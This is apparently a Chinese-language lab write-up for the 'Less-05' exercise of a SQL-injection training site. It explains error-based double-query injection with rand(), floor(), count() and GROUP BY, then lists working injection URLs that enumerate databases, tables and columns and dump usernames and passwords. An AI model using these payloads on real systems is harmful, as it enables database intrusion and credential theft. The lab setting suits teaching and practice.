Less-05 单引号 双注入
双注入查询需要理解四个函数/语句
Rand() 随机函数
Floor() 取整函数
Count() 汇总,聚合函数
Group by clause 分组语句
简单地说也就是在一个聚合函数里,如果count函数后面有分组语句,就会把查询的一部分以报错的形式显示出来。
爆库名
http://192.168.0.155/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 4,1),"给我隔开",floor(rand()*2)) as a from information_schema.tables group by a)x) --+
爆表名
http://192.168.0.155/Less-5/?id=1' and (select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 3,1),"给我隔开",floor(rand()*2)) as a from information_schema.tables group by a)x) --+
爆列,
这里恰好limit 1,1就是username列
http://192.168.0.155/Less-5/?id=1' and (select 1 from(select count(*),concat((select column_name from information_schema.columns where table_name='users' limit%201,1),"给我隔开",floor(rand(-1)*2)) as a from information_schema.tables group by a)x) --+
用户名列出来了,下一个应该就是密码列了
http://192.168.0.155/Less-5/?id=1' and (select 1 from(select count(*),concat((select column_name from information_schema.columns where table_name='users' limit 2,1),"给我隔开",floor(rand(-1)*2)) as a from information_schema.tables group by a)x) --+
完美,接下来就直接出用户名及其密码
http://192.168.0.155/Less-5/?id=1' and (select 1 from(select count(*),concat((select concat('我是账号',username,char(32,58,32),'我是密码',password) from security.users limit 1,1),"给我隔开",floor(rand(-1)*2)) as a from information_schema.tables group by a)x) --+